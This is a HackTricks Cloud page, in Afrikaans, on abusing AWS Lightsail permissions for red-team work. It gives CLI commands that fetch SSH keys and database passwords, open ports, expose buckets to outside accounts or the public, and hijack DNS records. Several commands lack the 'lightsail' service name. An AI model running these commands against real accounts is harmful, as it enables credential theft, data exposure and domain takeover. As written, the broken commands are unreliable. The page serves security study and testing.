AWS - Lightsail Privesc
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Lightsail
Vir meer inligting oor Lightsail, kyk:
Warning
Dit is belangrik om te let dat Lightsail nie IAM roles wat aan die gebruiker behoort gebruik nie maar aan ’n AWS managed account, so you can’t abuse this service to privesc. Daar kan egter gevoelige data soos code, API keys en database info in hierdie diens gevind word.
lightsail:DownloadDefaultKeyPair
Hierdie toestemming sal jou toelaat om die SSH keys te kry om toegang tot die instansies:
aws lightsail download-default-key-pair
Potensiële impak: Vind sensitiewe inligting binne die instansies.
lightsail:GetInstanceAccessDetails
Hierdie toestemming sal jou toelaat om SSH-sleutels te genereer om toegang tot die instansies te verkry:
aws lightsail get-instance-access-details --instance-name <instance_name>
Potentiale impak: Vind sensitiewe inligting binne die instansies.
lightsail:CreateBucketAccessKey
Hierdie toestemming laat jou toe om ’n sleutel te kry om toegang tot die bucket:
aws lightsail create-bucket-access-key --bucket-name <name>
Potensiële impak: Vind sensitiewe inligting in die bucket.
lightsail:GetRelationalDatabaseMasterUserPassword
Hierdie toestemming laat jou toe om die inlogbesonderhede te kry om toegang tot die databasis te verkry:
aws lightsail get-relational-database-master-user-password --relational-database-name <name>
Potensiële impak: Vind sensitiewe inligting binne die databasis.
lightsail:UpdateRelationalDatabase
Hierdie permissie laat jou toe om die databasis-wagwoord te verander:
aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
Indien die database nie public is nie, kan jy dit ook public maak met hierdie permissions:
aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
Potential Impact: Vind sensitiewe inligting binne die databasis.
lightsail:OpenInstancePublicPorts
Hierdie toestemming laat toe om poorte na die Internet oop te maak.
aws lightsail open-instance-public-ports \
--instance-name MEAN-2 \
--port-info fromPort=22,protocol=TCP,toPort=22
Potensiële impak: Toegang tot sensitiewe poorte.
lightsail:PutInstancePublicPorts
Hierdie permissie maak dit moontlik om poorte na die Internet oop te maak. Let wel dat die oproep enige ander oopgemaakte poort sal sluit wat nie daarin gespesifiseer is nie.
aws lightsail put-instance-public-ports \
--instance-name MEAN-2 \
--port-infos fromPort=22,protocol=TCP,toPort=22
Potensiële impak: Toegang tot sensitiewe poorte.
lightsail:SetResourceAccessForBucket
Hierdie toestemming laat toe dat ’n instance toegang tot ’n bucket kry sonder enige ekstra credentials.
aws set-resource-access-for-bucket \
--resource-name <instance-name> \
--bucket-name <bucket-name> \
--access allow
Potensiële impak: Potensiële nuwe toegang tot buckets met sensitiewe inligting.
lightsail:UpdateBucket
Met hierdie toestemming kan ’n aanvaller sy eie AWS-rekening lees toegang tot buckets gee of selfs die buckets vir almal openbaar maak:
# Grant read access to exterenal account
aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
# Grant read to the public
aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPublicOverrides=true
# Bucket private but single objects can be public
aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
Potential Impact: Potensiële nuwe toegang tot buckets met sensitiewe inligting.
lightsail:UpdateContainerService
Met hierdie permissions kan ’n aanvaller toegang verleen tot private ECRs vanaf die containers service
aws update-container-service \
--service-name <name> \
--private-registry-access ecrImagePullerRole={isActive=boolean}
Potensiële impak: Verkry sensitiewe inligting uit privaat ECR
lightsail:CreateDomainEntry
’n aanvaller met hierdie toestemming kan ’n subdomein skep en dit na sy eie IP-adres wys (subdomain takeover), of ’n SPF-rekord opstel wat hom toelaat om e-posse vanaf die domein te spoof, of selfs die hoofdomein na sy eie IP-adres wys.
aws lightsail create-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Potensiële impak: Oorneem ’n domein
lightsail:UpdateDomainEntry
’n Aanvaller met hierdie toestemming kan ’n subdomein skep en dit na sy eie IP-adres wys (subdomain takeover), of ’n SPF record saamstel wat hom toelaat om e-posse vanaf die domein te spoof, of selfs die hoofdomein na sy eie IP-adres te stel.
aws lightsail update-domain-entry \
--domain-name example.com \
--domain-entry name=dev.example.com,type=A,target=192.0.2.0
Potensiële impak: Neem ’n domein oor
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
HackTricks Cloud

